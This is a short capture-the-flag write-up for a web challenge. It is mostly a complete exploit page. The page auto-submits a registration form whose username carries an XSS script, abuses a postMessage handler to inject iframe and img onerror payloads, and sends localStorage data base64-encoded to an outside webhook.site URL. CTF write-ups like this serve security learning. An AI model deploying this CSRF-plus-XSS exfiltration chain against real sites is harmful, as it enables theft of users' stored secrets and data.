Create a malicious page, which registers a user with the following payload in the username:

1. Overwrite the body of secureenclave with <iframe id=frame src="/secure.js"></iframe><div id=site>https://securestorage.rars.win</div>. The additional div is necessary so that the check for site in the onmessage handler does not fail
2. Overwrite the body of the iframe we just created with some code to exfiltrate the flag: <img src=x onerror="fetch('https://webhook.site/0334edcb-76bd-414b-9caf-c5f304c121ce/${btoa(localStorage.message)}')"/>

Final HTML page:

<html>
<body onload="loginform.submit()">
  <form id="loginform" method="POST" action="https://securestorage.rars.win/api/register">
    <input type="text" class="form-control" name="user" placeholder="Username"
      value='5123<script>setTimeout(() => { storage = document.getElementById("secure_storage");storage.contentWindow.postMessage(["document.body.innerHTML", `<iframe id=frame src="/secure.js"></iframe><div id=site>https://securestorage.rars.win</div>`], storage.src);setTimeout(() => { storage.contentWindow.postMessage(["window.frame.contentWindow.document.body.innerHTML", "<img src=x onerror=\"fetch(`https://webhook.site/0334edcb-76bd-414b-9caf-c5f304c121ce/${btoa(localStorage.message)}`)\"/>"], storage.src); }, 500); }, 1000)</script>'>
    <input type="password" class="form-control" name="pass" placeholder="Password" value='123123'>
    <button type="submit" class="btn btn-primary mt-4">Login</button>
  </form>
</body>
</html>